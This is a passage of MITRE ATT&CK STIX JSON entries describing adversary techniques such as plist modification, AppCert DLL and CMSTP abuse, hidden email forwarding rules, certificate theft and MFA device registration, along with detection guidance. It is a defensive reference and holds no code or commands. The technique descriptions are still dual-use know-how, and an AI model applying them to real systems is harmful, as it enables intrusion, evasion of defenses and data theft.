key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).\n\nFor example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the LSUIElement key in an application\u2019s info.plist file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as LSEnvironment, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for common command-line editors used to modify plist files located in auto-run locations, such as \\~/LaunchAgents, ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm, and an application's Info.plist. \n\nMonitor for plist file modification immediately followed by code execution from \\~/Library/Scripts and ~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist.\n\nIdentify new services executed from plist modified in the previous user's session. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7d20fff9-8751-404e-badd-ccd71bda0236", "created": "2022-04-09T15:06:32.458Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1647", "external_id": "T1647"}, {"source_name": "eset_osx_flashback", "description": "ESET. (2012, January 1). OSX/Flashback. Retrieved April 19, 2022.", "url": "https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/osx_flashback.pdf"}, {"source_name": "fileinfo plist file description", "description": "FileInfo.com team. (2019, November 26). .PLIST File Extension. Retrieved October 12, 2021.", "url": "https://fileinfo.com/extension/plist"}, {"source_name": "wardle chp2 persistence", "description": "Patrick Wardle. (2022, January 1). The Art of Mac Malware Volume 0x1:Analysis. Retrieved April 19, 2022.", "url": "https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "AppCert DLLs", "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\ are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) \n\nTools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_effective_permissions": ["Administrator", "SYSTEM"], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c", "created": "2020-01-24T14:47:41.795Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/009", "external_id": "T1546.009"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}, {"source_name": "Sysinternals AppCertDlls Oct 2007", "description": "Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. Retrieved December 18, 2017.", "url": "https://forum.sysinternals.com/appcertdlls_topic12546.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "CMSTP", "description": "The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1117) / \u201dSquiblydoo\u201d, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank", "Nik Seetharaman, Palantir"], "x_mitre_detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\n\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n\n* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.\n* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Application whitelisting", "Anti-virus"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7d6f590f-544b-45b4-9a42-e0805f342af3", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1191", "external_id": "T1191"}, {"source_name": "Microsoft Connection Manager Oct 2009", "description": "Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018.", "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)"}, {"source_name": "Twitter CMSTP Usage Jan 2018", "description": "Carr, N. (2018, January 31). Here is some early bad cmstp.exe... Retrieved April 11, 2018.", "url": "https://twitter.com/ItsReallyNick/status/958789644165894146"}, {"source_name": "MSitPros CMSTP Aug 2017", "description": "Moe, O. (2017, August 15). Research on CMSTP.exe. Retrieved April 11, 2018.", "url": "https://msitpros.com/?p=3960"}, {"source_name": "Twitter CMSTP Jan 2018", "description": "Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved April 11, 2018.", "url": "https://twitter.com/NickTyrer/status/958450014111633408"}, {"source_name": "GitHub Ultimate AppLocker Bypass List", "description": "Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.", "url": "https://github.com/api0cradle/UltimateAppLockerByPassList"}, {"source_name": "Endurant CMSTP July 2018", "description": "Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved August 6, 2018.", "url": "http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Multi-hop Proxy", "description": "To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7d751199-05fa-4a72-920f-85df4506c76c", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1188", "external_id": "T1188"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Email Forwarding Rule", "description": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim\u2019s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)\n\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)\n\nIn some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Microsoft Security", "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)", "Liran Ravich, CardinalOps"], "x_mitre_deprecated": false, "x_mitre_detection": "Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Office 365", "Windows", "Google Workspace", "macOS", "Linux"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", "created": "2020-02-19T18:54:47.103Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1114/003", "external_id": "T1114.003"}, {"source_name": "Mac Forwarding Rules", "description": "Apple. (n.d.). Reply to, forward, or redirect emails in Mail on Mac. Retrieved June 22, 2021.", "url": "https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac"}, {"source_name": "Pfammatter - Hidden Inbox Rules", "description": "Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in Microsoft Exchange. Retrieved October 12, 2021.", "url": "https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/"}, {"source_name": "Microsoft Tim McMichael Exchange Mail Forwarding 2", "description": "McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.", "url": "https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/"}, {"source_name": "Microsoft Mail Flow Rules 2023", "description": "Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.", "url": "https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules"}, {"source_name": "US-CERT TA18-068A 2018", "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-11-08T14:00:00.188Z", "name": "Data Staged", "description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Praetorian", "Shane Tully, @securitygypsy"], "x_mitre_deprecated": false, "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nConsider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "IaaS", "Linux", "macOS"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", "created": "2017-05-31T21:30:58.938Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1074", "external_id": "T1074"}, {"source_name": "Mandiant M-Trends 2020", "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020"}, {"source_name": "PWC Cloud Hopper April 2017", "description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.", "url": "https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Steal or Forge Authentication Certificates", "description": "Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)\n\nAuthentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate\u2019s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate\u2019s subject alternative name (SAN) values define the certificate owner\u2019s alternate names.(Citation: Medium Certified Pre Owned)\n\nAbusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.\n\nAdversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as \u201cgolden\u201d certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Tristan Bennett, Seamless Intelligence", "Lee Christensen, SpecterOps", "Thirumalai Natarajan, Mandiant"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS", "Azure AD"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", "created": "2022-08-03T03:20:58.955Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1649", "external_id": "T1649"}, {"source_name": "GitHub GhostPack Certificates", "description": "HarmJ0y. (2018, August 22). SharpDPAPI - Certificates. Retrieved August 2, 2022.", "url": "https://github.com/GhostPack/SharpDPAPI#certificates"}, {"source_name": "Microsoft AD CS Overview", "description": "Microsoft. (2016, August 31). Active Directory Certificate Services Overview. Retrieved August 2, 2022.", "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831740(v=ws.11)"}, {"source_name": "Medium Certified Pre Owned", "description": "Schroeder, W. (2021, June 17). Certified Pre-Owned. Retrieved August 2, 2022.", "url": "https://posts.specterops.io/certified-pre-owned-d95910965cd2"}, {"source_name": "SpecterOps Certified Pre Owned", "description": "Schroeder, W. & Christensen, L. (2021, June 22). Certified Pre-Owned - Abusing Active Directory Certificate Services. Retrieved August 2, 2022.", "url": "https://web.archive.org/web/20220818094600/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf"}, {"source_name": "O365 Blog Azure AD Device IDs", "description": "Syynimaa, N. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved August 3, 2022.", "url": "https://o365blog.com/post/deviceidentity/"}, {"source_name": "GitHub CertStealer", "description": "TheWover. (2021, April 21). CertStealer. Retrieved August 2, 2022.", "url": "https://github.com/TheWover/CertStealer"}, {"source_name": "APT29 Deep Look at Credential Roaming", "description": "Thibault Van Geluwe De Berlaere. (2022, November 8). They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming. Retrieved November 9, 2022.", "url": "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-03T17:38:39.065Z", "name": "Device Registration", "description": "Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.\n\nMFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user\u2019s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Pawel Partyka, Microsoft 365 Defender", "Mike Moran", "Joe Gumke, U.S. Bank", "Arad Inbar, Fidelis Security"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Azure AD", "Windows", "SaaS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215", "created": "2022-03-04T18:30:38.989Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1098/005", "external_id": "T1098.005"}, {"source_name": "CISA MFA PrintNightmare", "description": "Cybersecurity and Infrastructure Security Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and \u201cPrintNightmare\u201d Vulnerability. Retrieved March 16, 2022.", "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-074a"}, {"source_name": "Mandiant APT29 Microsoft 365 2022", "description": "Douglas Bienstock. (2022, August 18). You Can\u2019t Audit Me: APT29 Continues Targeting Microsoft 365. Retrieved February 23, 2023.", "url": "https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft"}, {"source_name": "AADInternals - Conditional Access Bypass", "description": "Dr. Nestori Syynimaa. (2020, September 6). Bypassing conditional access by faking device compliance. Retrieved March 4, 2022.", "url": "https://o365blog.com/post/mdm"}, {"source_name": "AADInternals - BPRT", "description": "Dr. Nestori Syynimaa. (2021, January 31). BPRT unleashed: Joining multiple devices to Azure AD and Intune. Retrieved March 4, 2022.", "url": "https://o365blog.com/post/bprt/"}, {"source_name": "AADInternals - Device Registration", "description": "Dr. Nestori Syynimaa. (2021, March 3). Deep-dive to Azure AD device join. Retrieved March 9, 2022.", "url": "https://o365blog.com/post/devices/"}, {"source_name": "DarkReading FireEye SolarWinds", "description": "Kelly Jackson Higgins. (2021, January 7). FireEye's Mandia: 'Severity-Zero Alert' Led to Discovery of SolarWinds Attack. Retrieved April 18, 2022.", "url": "https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack"}, {"source_name": "Microsoft - Device Registration", "description": "Microsoft 365 Defender Threat Intelligence Team. (2022, January 26). Evolved phishing: Device registration trick adds to phishers\u2019 toolbox for victims without MFA. Retrieved March 4, 2022.", "url": "https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa"}, {"source_name": "Microsoft DEV-0537", "description": "Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.", "url": "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-11-08T14:00:00.188Z", "name": "System Network Connections Discovery", "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who 